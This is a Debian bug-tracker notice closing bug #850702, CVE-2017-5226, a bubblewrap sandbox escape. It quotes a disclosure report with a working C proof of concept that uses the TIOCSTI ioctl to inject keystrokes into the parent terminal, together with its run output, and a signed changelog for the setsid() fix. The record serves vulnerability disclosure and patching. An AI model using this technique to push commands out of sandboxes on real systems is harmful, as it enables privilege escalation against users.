Bug#850702: marked as done (CVE-2017-5226 -- bubblewrap escape)

Mon, 09 Jan 2017 10:37:14 -0800 

Your message dated Mon, 09 Jan 2017 18:33:21 +0000
with message-id <e1cqekz-0007t5...@fasolo.debian.org>
and subject line Bug#850702: fixed in bubblewrap 0.1.5-2
has caused the Debian Bug report #850702,
regarding CVE-2017-5226 -- bubblewrap escape
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
850702: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 
Source: bubblewrap
Version: All
Severity: grave

Hi,

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test 
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

Thanks,
Federico Bento.

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

--- End Message ---
--- Begin Message --- 
Source: bubblewrap
Source-Version: 0.1.5-2

We believe that the bug you reported is fixed in the latest version of
bubblewrap, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 850...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Simon McVittie <s...@debian.org> (supplier of updated bubblewrap package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 09 Jan 2017 18:09:54 +0000
Source: bubblewrap
Binary: bubblewrap
Architecture: source
Version: 0.1.5-2
Distribution: unstable
Urgency: high
Maintainer: Utopia Maintenance Team 
<pkg-utopia-maintain...@lists.alioth.debian.org>
Changed-By: Simon McVittie <s...@debian.org>
Description:
 bubblewrap - setuid wrapper for unprivileged chroot and namespace manipulation
Closes: 850702
Changes:
 bubblewrap (0.1.5-2) unstable; urgency=high
 .
   * d/p/Call-setsid-before-executing-sandboxed-code-CVE-2017-5226.patch:
     Call setsid() before executing sandboxed code, preventing a
     sandboxed executable invoked with a controlling terminal (for
     example in Flatpak) from escalating its privileges by injecting
     keypresses into the controlling terminal with the TIOCSTI
     ioctl. (Closes: #850702; CVE-2017-5226)
   * d/control: remove Maintainer status from Laszlo Boszormenyi at his
     request. Add him to Uploaders instead, and hand the package over
     to the Utopia Maintenance Team (the same as OSTree and Flatpak).
Checksums-Sha1:
 465ce1918329c65e441c2772d939c933479bb9ac 2177 bubblewrap_0.1.5-2.dsc
 741a7935a49fb36afdea5fd73b9ce3210901e1a3 5376 bubblewrap_0.1.5-2.debian.tar.xz
Checksums-Sha256:
 8fb221eb67a948380dc6718e79ace999a6ab9a8d3d1f777441f5abdf5acd02bc 2177 
bubblewrap_0.1.5-2.dsc
 7164edcf23a4ee7dfee2bacb89634cbdd086843520be4eb45bc84560473e410b 5376 
bubblewrap_0.1.5-2.debian.tar.xz
Files:
 f381ca8bd16072592b4efd3e236cab82 2177 admin optional bubblewrap_0.1.5-2.dsc
 e2546f647dd6d7bf7ac55012a1475a9c 5376 admin optional 
bubblewrap_0.1.5-2.debian.tar.xz

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE2pjyXAhxxJpZ6v8sTej/KmPHzJAFAlhz05wACgkQTej/KmPH
zJBm9w/+NZHN7IVg3M6ORKYNx9YcuuChJdl86eWnD2NfsxniMgTtDqkEQGTwg6cT
Ll1KOogAHgEaZtwCrow+JgtPJ5LcxKces34asD5UmwCcTwGoqP7wlZmPR2M8hXx4
t39T6qoacQMEgS/TrGYhDyXSaSc7iwiqXHnbvEqbT3qvPNhp1evzyTuwmETCfjAt
PyykJUNLov4WprEFN0l5T6H8CTPEa/qp0INfJbJlJoauumwK1btyholYog8kw2D+
vkJ7m8mEREvXJR5Fu627bdNbta+bDyMaN5cIba71e0QF6qcSd+LH04FI4/gMQqXT
f+HWfoGjtI0ZbJgh/lDXHUmn5uRAl3QohrJxRD85uFaIJVa6YUa5S1W3CTvY3j2p
/Nh6nLDBT8BBMglYDbG1DtTjaPDAcj0Qvh2Q7/t5l4iqKTeUYhvQEjYJdNWI4Qz6
wDL51+bYElqlWwok00znsBQhej7jd738gKo/XhMUVbM7yphUQEOX2jdfILzWSUL0
M7mZyRlC1v8+SgqSYVrtMPW0xyzj94/voR4MANRyZN/PehAF3BL/6vf8aWwcqoLX
KPuYz5FFuDWiWWsNHBak52AfEJeVrGwFZeIcXZlFQVGA1Q0ESvWVWvMjnAhEmEhu
Zo0PNfWkMP7D+daMkDPYC6l8zzwZmu/pPkTGxipb3JwtzcD+aDo=
=JSfd
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to